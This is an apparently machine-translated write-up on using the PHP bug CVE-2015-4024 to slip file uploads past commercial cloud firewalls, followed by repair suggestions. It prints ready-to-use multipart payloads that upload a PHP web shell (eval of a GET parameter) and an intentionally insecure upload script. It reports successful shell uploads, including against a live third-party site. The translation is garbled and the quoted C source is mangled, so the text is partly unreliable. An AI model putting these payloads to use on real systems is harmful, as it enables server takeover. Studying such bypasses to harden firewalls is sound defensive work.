1. Background information
Today we want to start with a PHP remote DOS vulnerability in 2015.04.03 (cve-2015-4024). See the link below for technical details, https://bugs.php.net/bug.php?id=69364. Because PHP parses the header of the body part for string stitching, and the stitching process repeats the copy character resulting in DOS. In fact, the vulnerability has other non-DOS utilization value, one of which is to bypass the current various cloud WAF file upload defense strategy.
At present, domestic and foreign popular cloud WAF manufacturers like Baidu Cloud acceleration, 360 website defender, accelerating music, solutions and so on. Because of the PHP remote DOS vulnerability and the features of the official PHP repair program, we successfully exploited this vulnerability to bypass the current mainstream WAF file upload defenses, such as Baidu Cloud acceleration, 360 site Defenders, know-how to accelerate music, security dog.
Next, let's take PHP as an example to parse our bypass method in detail.
2. How to bypass WAF
According to the PHP dos vulnerability principle, when the Multipart_buffer_headers function parses the header corresponding to value, the value has n rows. Each line of string starts with a white space or does not have the character ': ', triggering the following code block that merges the value. The value of the parse header then executes (n-1) The block of code that merges value, resulting in DOS.
prev_len= strlen (Prev_entry.value);
cur_len= strlen (line);
Entry.value= Emalloc (Prev_len + Cur_len + 1); 1 Times Shard Memory
memcpy (Entry.value,prev_entry.value, Prev_len); 1-time Copy
memcpy (entry.value+ Prev_len, line, Cur_len); 1-time Copy
entry.value[cur_len+ Prev_len] = ' + ';
entry.key= estrdup (Prev_entry.key);
Zend_llist_remove_tail (header);//1 Memory release
While the official PHP fix, when merging, avoid duplicate copies, so as to avoid DOS. The key to bypassing the WAF is that when the PHP multipart_buffer_headers function parses the header for value, there are multiple rows of value values. The string for each line starts with a white space or does not have the character ': ' and is merged. WAF does not consider protocol compatibility when parsing file name uploads, and it can be bypassed without a multi-line merge.
According to the principle of construction bypass WAF file upload Defense Payload,waf resolution to the file named "Test3.jpg", and php resolves to the file name is "test3.jpg\nf/shell.php", because "/" is the directory delimiter, The uploaded file name becomes shell.php. The following are file uploads that bypass paylaod, test scripts, and Paylaod.
WAF bypasses payload:
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
Content-disposition:form-data; Name= "File"; Filename= "test3.jpg\nsf/shell.php
Content-type:application/octet-stream
<?php eval ($_get[' C '])?>
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
File Upload function test feet:
<?php
$name = $_files[' file ' [' Name '];
Echo $name;
echo "\ n";
Move_uploaded_file ($_files[' file '] [' tmp_name '], '/usr/local/nginx/html/upload/'. $_files[' file ' [' name ']);
echo "Upload success!". $_files[' file ' [' Name '];
echo "\ n";
echo strlen ($_files[' file ' [' name ']);
?>
Payload can upload normally
3. Bypass WAF Combat
The author through the establishment of their own test station, access to 360 website defender and accelerated music, to verify the way to bypass WAF file upload defense.
3.1 Bypass the website Defender
Step 1, verify that the website has been defended by the 360 website defender, intercepting requests to upload PHP files directly.
Step 2: Successfully bypass the 360 website defender, upload the shell successfully, the file is apo.php. In this request, there is no content-type that does not affect the bypass.
3.2 bypassing know Chong Woo accelerated music
Step one: Verify that the website is accelerated for music protection, blocking requests to upload PHP files directly.
Step Two:
Successfully bypass acceleration music, upload shell, file is syt.php.
3.3. bypassing Baidu cloud acceleration
Baidu Cloud acceleration and CloudFlare, from Baidu to speed up the interception page can see the use of CloudFlare. But the estimated localization, Baidu cloud acceleration should be Baidu and CloudFlare common product bar. Testing Baidu did not set up its own test environment, found an access to the Baidu Cloud acceleration station to test.
Step one: Verify that the website was accelerated by Baidu Cloud protection, blocking the direct upload of PHP files request.
Step two: Successfully bypassing cloud acceleration
4. Expansion-more work
4.1 Analysis filename bypass of other characters
Similarly, we found that in addition to double quotes, using single quotation marks bypasses the defenses of WAF and implements file uploads.
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
Content-disposition:form-data; Name= "File"; Filename= ' test3.jpg\nsf/shell.php
Content-type:application/octet-stream
<?php eval ($_get[' C '])?>
------WEBKITFORMBOUNDARYX7V4AHIPWN8IG52Y
4.2 Analyze Other application scripting languages
We also found that JSP parsing has its own characteristics and can be used to bypass the WAF. For the time being, the commonly used Web application scripting languages such as Asp,aspx,python are not tested.
5. Repair Solution
5.1 Repair Scenario One
When parsing a file upload request, the request is denied if the discovery request does not conform to the protocol specification. A false intercept may occur and the extent of the impact of a false intercept needs to be assessed.
5.2 Repair Scenario Two
PHP-compatible file parsing, when parsing a file name, begins with a single or double quotation mark, and the corresponding single or double quotation marks are closed.
6. Summary
This article has successfully uploaded the shell by review PHP remote DOS Vulnerability (CVE-2015-4024) and using this feature to bypass file upload defenses for existing WAF. More important value provides us with a new way of thinking around the WAF, a new direction: using the back-end application scripts and WAF behavior differences to circumvent the WAF defenses. In general, a good WAF should be able to handle the differences between compatible Web application containers, standard protocols, and Web servers.
New use of PHP dos vulnerability: cve-2015-4024 reviewed